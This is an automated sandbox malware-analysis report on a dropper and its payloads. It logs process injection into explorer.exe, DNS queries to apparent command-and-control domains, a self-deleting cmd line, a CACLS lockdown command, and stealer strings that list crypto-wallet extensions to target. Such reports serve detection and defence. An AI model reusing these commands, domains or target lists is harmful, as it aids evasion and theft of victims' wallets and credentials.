,GetProcAddress,MoveFileExW,SetThreadContext,SetEvent,FindActCtxSectionStringW,_memset,SetDefaultCommConfigW,lstrcmpW,HeapSetInformation,GetConsoleMode,GetFileAttributesExW,GetPrivateProfileStructW,SetCriticalSectionSpinCount,GetPrivateProfileStructA,GetSystemTimeAdjustment,GetComputerNameA,GetPrivateProfileStringW,CloseHandle,ExitProcess,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 0_2_00422570 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 0_2_00419DF0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 0_2_004207D0 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Code function: 17_2_00413711 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Code function: 17_2_0041651C SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Code function: 17_2_00413531 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: privacytoolzforyou-7000.com
Source: C:\Windows\explorer.exe	Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe	Domain query: host-file-host-3.com
Source: C:\Windows\explorer.exe	Domain query: host-data-coin-11.com

Benign windows process drops PE files

Show sources

Source: C:\Windows\explorer.exe

File created: hiftsuu.6.dr

Jump to dropped file

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\v72n86vFFq.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\hiftsuu	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\hiftsuu	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\51B3.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\51B3.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\hiftsuu	Memory written: C:\Users\user\AppData\Roaming\hiftsuu base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\51B3.exe	Memory written: C:\Users\user\AppData\Local\Temp\51B3.exe base: 400000 value starts with: 4D5A

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\AppData\Roaming\hiftsuu

Code function: 8_2_004E0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\v72n86vFFq.exe	Thread created: C:\Windows\explorer.exe EIP: 4F41930
Source: C:\Users\user\AppData\Roaming\hiftsuu	Thread created: unknown EIP: 5D81930
Source: C:\Users\user\AppData\Local\Temp\51B3.exe	Thread created: unknown EIP: 4DA1930

.NET source code references suspicious native API functions

Show sources

Source: 1EAA.exe.6.dr, Oldening.Listeners/Server.cs	Reference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
Source: 2340.exe.6.dr, u0086u0086u0086u0086u0086u0086u0086u008au0088u0086/u0086u0086u0086u0086u0086u0086u0086u008au0087u009e.cs	Reference to suspicious API methods: ('??????????', 'GetProcAddress@kernel32'), ('??????????', 'LoadLibrary@kernel32')
Source: 2340.exe.6.dr, u0086u0086u0086u0086u0086u0086u0086u0089u0092u008d/u0086u0086u0086u0086u0086u0086u0086u0089u0092u008c.cs	Reference to suspicious API methods: ('??????????', 'GetProcAddress@kernel32'), ('??????????', 'LoadLibrary@kernel32.dll')
Source: 9.2.12F1.exe.ce0000.0.unpack, l2vD8Fitdl8qSVEp19/mEqmoE9UxRmX9ogcto.cs	Reference to suspicious API methods: ('CXGWjLQ8Hp', 'LoadLibrary@kernel32'), ('REpW7ZaJOo', 'GetProcAddress@kernel32')
Source: 9.2.12F1.exe.ce0000.0.unpack, NativeHelper.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 10.0.1EAA.exe.e80000.1.unpack, Oldening.Listeners/Server.cs	Reference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
Source: 10.0.1EAA.exe.e80000.3.unpack, Oldening.Listeners/Server.cs	Reference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
Source: 10.0.1EAA.exe.e80000.0.unpack, Oldening.Listeners/Server.cs	Reference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
Source: 10.2.1EAA.exe.e80000.0.unpack, Oldening.Listeners/Server.cs	Reference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
Source: 10.0.1EAA.exe.e80000.2.unpack, Oldening.Listeners/Server.cs	Reference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
Source: 14.2.1EAA.exe.410000.0.unpack, Oldening.Listeners/Server.cs	Reference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
Source: 14.0.1EAA.exe.410000.1.unpack, Oldening.Listeners/Server.cs	Reference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
Source: 14.0.1EAA.exe.410000.3.unpack, Oldening.Listeners/Server.cs	Reference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')

Source: C:\Users\user\Desktop\v72n86vFFq.exe	Process created: C:\Users\user\Desktop\v72n86vFFq.exe "C:\Users\user\Desktop\v72n86vFFq.exe"
Source: C:\Users\user\AppData\Roaming\hiftsuu	Process created: C:\Users\user\AppData\Roaming\hiftsuu C:\Users\user\AppData\Roaming\hiftsuu
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process created: C:\Users\user\AppData\Local\Temp\1EAA.exe C:\Users\user\AppData\Local\Temp\1EAA.exe
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process created: C:\Users\user\AppData\Local\Temp\1EAA.exe C:\Users\user\AppData\Local\Temp\1EAA.exe
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\44A2.exe" & exit
Source: C:\Users\user\AppData\Local\Temp\51B3.exe	Process created: C:\Users\user\AppData\Local\Temp\51B3.exe C:\Users\user\AppData\Local\Temp\51B3.exe
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process created: C:\Users\user\AppData\Local\Temp\2340.exe C:\Users\user\AppData\Local\Temp\2340.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c echo Y\|CACLS "C:\Users\user\AppData\Local\Temp\6829558ede\tkools.exe" /P "user:N

Source: explorer.exe, 00000006.00000000.709418248.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.695565323.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.720888272.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000006.00000000.695740552.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.709702492.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.721124644.0000000001080000.00000002.00020000.sdmp, 361B.exe, 0000000D.00000000.802553020.00000000033B0000.00000002.00020000.sdmp, 361B.exe, 0000000D.00000000.800352217.00000000033B0000.00000002.00020000.sdmp, 305.exe, 00000016.00000002.976606115.0000000001980000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.695740552.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.712517045.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.709702492.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.721124644.0000000001080000.00000002.00020000.sdmp, 361B.exe, 0000000D.00000000.802553020.00000000033B0000.00000002.00020000.sdmp, 361B.exe, 0000000D.00000000.800352217.00000000033B0000.00000002.00020000.sdmp, 305.exe, 00000016.00000002.976606115.0000000001980000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.695740552.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.709702492.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.721124644.0000000001080000.00000002.00020000.sdmp, 361B.exe, 0000000D.00000000.802553020.00000000033B0000.00000002.00020000.sdmp, 361B.exe, 0000000D.00000000.800352217.00000000033B0000.00000002.00020000.sdmp, 305.exe, 00000016.00000002.976606115.0000000001980000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.695740552.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.709702492.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.721124644.0000000001080000.00000002.00020000.sdmp, 361B.exe, 0000000D.00000000.802553020.00000000033B0000.00000002.00020000.sdmp, 361B.exe, 0000000D.00000000.800352217.00000000033B0000.00000002.00020000.sdmp, 305.exe, 00000016.00000002.976606115.0000000001980000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000000.715379246.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.701280691.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.729575553.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Users\user\Desktop\v72n86vFFq.exe

Code function: lstrlenW,BackupWrite,_wscanf,__wremove,_puts,__putw,__wrename,_atexit,GetBinaryTypeW,SetCurrentDirectoryW,QueueUserWorkItem,GetBinaryTypeW,SetCurrentDirectoryW,LeaveCriticalSection,QueryDosDeviceA,TerminateJobObject,EnumDateFormatsExA,GlobalAddAtomW,CreateJobSet,WriteProfileStringW,GetFullPathNameA,VirtualAlloc,GetCompressedFileSizeW,WriteConsoleOutputAttribute,SetNamedPipeHandleState,lstrcpynW,GetFileAttributesA,FatalAppExitW,GetCurrentProcess,IsBadWritePtr,SetUnhandledExceptionFilter,QueueUserWorkItem,GetProcessHandleCount,QueueUserWorkItem,EnumResourceNamesW,DeleteTimerQueueTimer,SetFileApisToANSI,FindResourceA,AllocateUserPhysicalPages,GetBinaryTypeA,OpenMutexA,GetModuleFileNameW,CommConfigDialogA,HeapSize,_memset,CommConfigDialogA,HeapSize,GetComputerNameA,OpenMutexW,GetConsoleCursorInfo,OpenSemaphoreA,ResetWriteWatch,CreateActCtxA,LoadLibraryW,WriteProfileStringA,GetConsoleCursorInfo,OpenSemaphoreA,SetUnhandledExceptionFilter,ResetWriteWatch,ChangeTimerQueueTimer,SetFilePointer,SetCommState,EnumSystemLocalesA,_lclose,SetSystemTimeAdjustment,_memset,GetCommConfig,EnumDateFormatsW,LocalUnlock,WriteConsoleInputW,GetConsoleAliasExesLengthW,GetAtomNameA,IsBadStringPtrA,CreateIoCompletionPort,SearchPathA,SetConsoleCursorPosition,GetVolumePathNamesForVolumeNameW,SetConsoleCP,MoveFileExW,EnumDateFormatsExW,UnregisterWaitEx,SetSystemTime,SetThreadExecutionState,CreateHardLinkW,HeapWalk,lstrcpyA,SetFileValidData,OutputDebugStringA,FreeEnvironmentStringsW,FindNextFileA,FreeEnvironmentStringsW,FindFirstFileW,FindNextFileA,InterlockedDecrement,InterlockedDecrement,WaitNamedPipeW,WritePrivateProfileStringA,LoadLibraryW,DefineDosDeviceA,SetConsoleTitleW,GetPrivateProfileIntA,OutputDebugStringA,InterlockedPushEntrySList,CreateActCtxA,VirtualLock,lstrcatW,WriteProfileStringA,TerminateProcess,WritePrivateProfileSectionA,GlobalMemoryStatus,UnmapViewOfFile,_memset,GetDefaultCommConfigA,GetTempPathW,WriteFileGather,FindFirstFileW,ContinueDebugEvent,GetThreadSelectorEntry,FatalAppExitA,DeleteVolumeMountPointA,GetStringTypeA,CreateSemaphoreW,CreateSemaphoreW,SetLocalTime,EnumTimeFormatsA,FindResourceExA,GetPrivateProfileSectionNamesA,SetStdHandle,CloseHandle,CloseHandle,DeleteFileW,EnumDateFormatsA,CreateSemaphoreW,GetNumberFormatA,ReadConsoleOutputW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,GetVolumePathNamesForVolumeNameW,GetProcAddress,MoveFileExW,SetThreadContext,SetEvent,FindActCtxSectionStringW,_memset,SetDefaultCommConfigW,lstrcmpW,HeapSetInformation,GetConsoleMode,GetFileAttributesExW,GetPrivateProfileStructW,SetCriticalSectionSpinCount,GetPrivateProfileStructA,GetSystemTimeAdjustment,GetComputerNameA,GetPrivateProfileStringW,CloseHandle,ExitProcess,

Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\12F1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\12F1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\12F1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\12F1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\12F1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1EAA.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1EAA.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\2340.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Entity.Design\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Entity.Design.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\12F1.exe

Code function: 9_2_00DE8386 cpuid

Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\305.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\305.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\305.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\v72n86vFFq.exe

Code function: 0_2_00433EF0 VerLanguageNameW,CopyFileExA,SetConsoleMode,TlsSetValue,GetConsoleCP,GetPrivateProfileStringA,VerifyVersionInfoW,GetVersionExW,WTSGetActiveConsoleSessionId,ExitProcess,

Source: Amcache.hve.19.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: 12F1.exe, 00000009.00000002.947404488.0000000000956000.00000004.00000020.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 20.0.1EAA.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.1EAA.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.1EAA.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.1EAA.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.1EAA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.1EAA.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.1EAA.exe.45835c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.12F1.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.1EAA.exe.44e5e88.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.1EAA.exe.45835c0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.1EAA.exe.44e5e88.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.948865342.0000000000CE2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.830171711.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.820409193.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.845557160.000000000434F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.847931111.0000000004503000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.829040256.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.938711812.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.832066411.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 12F1.exe PID: 6580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1EAA.exe PID: 5572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1EAA.exe PID: 2740, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Cryptbot

Show sources

Source: Yara match	File source: 00000016.00000002.947756314.00000000012C5000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.835817824.00000000009D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 305.exe PID: 1380, type: MEMORYSTR

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 0000000C.00000002.814172336.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.736880382.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.737014881.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.854879480.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.853177748.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.815844712.0000000002091000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.724058055.0000000004F41000.00000020.00020000.sdmp, type: MEMORY

Yara detected Amadey bot

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Show sources

Source: Yara match

File source: 00000011.00000002.854851899.0000000000555000.00000004.00000001.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: 12F1.exe, 00000009.00000002.978458353.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: 305.exe, 00000016.00000002.947756314.00000000012C5000.00000002.00020000.sdmp	String found in binary or memory: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36index.phpPOSTpassword\*\/(chrome default)(chrome profile 1)(brave)(opera)\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\Local Extension Settings\mnojpmjdmbbfmejpflffifhffcmidifd\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib\Local Extension Settings\aeachknmefphepccionboohckonoeemg\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\_Files\_Wallet\Metamask \_Files\_Wallet\Ronin \_Files\_Wallet\Yoroi \_Files\_Wallet\Tronlink \_Files\_Wallet\Nifty \_Files\_Wallet\Math \_Files\_Wallet\Coinbase \_Files\_Wallet\BinanceChain \_Files\_Wallet\Brave \_Files\_Wallet\Guarda \_Files\_Wallet\Equal \_Files\_Wallet\JaxxxLiberty \_Files\_Wallet\BitApp \_Files\_Wallet\iWallet \_Files\_Wallet\Wombat \_Files\_Wallet\Atomic \_Files\_Wallet\MewCx \_Files\_Wallet\Guild \_Files\_Wallet\Saturn \_Files\_Wallet\TerraStation \_Files\_Wallet\Harmony \_Files\_Wallet\Coin98 \_Files\_Wallet\TON Crystall \_Files\_Wallet\KardiaChain \files_\cryptocurrency\Metamask \files_\cryptocurrency\Ronin \files_\cryptocurrency\Yoroi \files_\cryptocurrency\Tronlink 